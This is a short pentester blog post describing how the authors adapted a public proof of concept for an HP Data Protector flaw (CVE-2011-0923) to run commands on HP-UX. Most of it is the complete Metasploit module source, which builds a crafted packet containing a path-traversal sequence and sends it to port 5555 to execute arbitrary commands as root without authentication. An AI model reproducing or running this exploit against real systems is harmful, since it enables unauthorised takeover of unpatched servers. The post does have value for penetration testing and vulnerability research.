This is a quick post on a vuln we (ch0ks and I)identified and exploit in a HP-UX during a pentest. The vuln had been already reported on the ZDI site and had a working PoC on security focus. The thing is though, that the working exploit only worked for Windows servers and workstations. After some time of analysis by ch0ks and me during the pentest we figure out a way to execute commands on the HP-UX server with a modified version of the payload included in the PoC. The full explanation of how we did this can be found in Adrian's Puente (ch0ks) blog hackarandas.
The metasploit module that I developed using this analysis has been already submitted to the team and hopefully they will included in it. Just to show you guys that I am not full of it I included some screenshots of the execution of the module.
Module options:
Example of the working exploit runnng a simple command on the HP-UX (/usr/bin/id):
gr33tz to ch0ks, etlow.
c4an.
Exploit code:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Remote Command Execution',
'Description' => %q{
This exploit abuses a vulnerability in the HP Data
Protector service. This flaw allows an unauthenticated
attacker to execute arbitrary commands with the privileges
of the root user.
},
'Author' => [ 'c4an', 'ch0ks'],
'Version' => '$Revision: 10561 $',
'References' =>
[
[ 'CVE', '2011-0923'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/'],
[ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
[ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux']
],
'Platform' => [ 'unix','linux'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' =>10000,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic',
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'June 26 2011'
))
register_options(
[
Opt::RPORT(5555),
], self.class)
end
def exploit
print_status("Sending our commmand...")
# Send the job request with the encoded command
shell_mio = "usr/bin/sh"
salto = "\n"
s = salto.encode
shellcode = "\x00\x00\x00\xa4\x20\x32\x00\x20\x63\x34\x61\x6e\x63\x34\x61\x6e" +
"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x63\x34\x61\x6e" +
"\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20\x63\x34" +
"\x61\x6e\x20\x20\x20\x20\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41" +
"\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48" +
"\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49" +
"\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f" +
"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" +
"\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"
shell = shell_mio +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
payload.encode + s
sploit = shellcode + shell
begin
connect
sock.put(sploit)
res = sock.get
print_status(res.to_s)
handler
rescue
print_status("Error in connection or socket")
end
end
end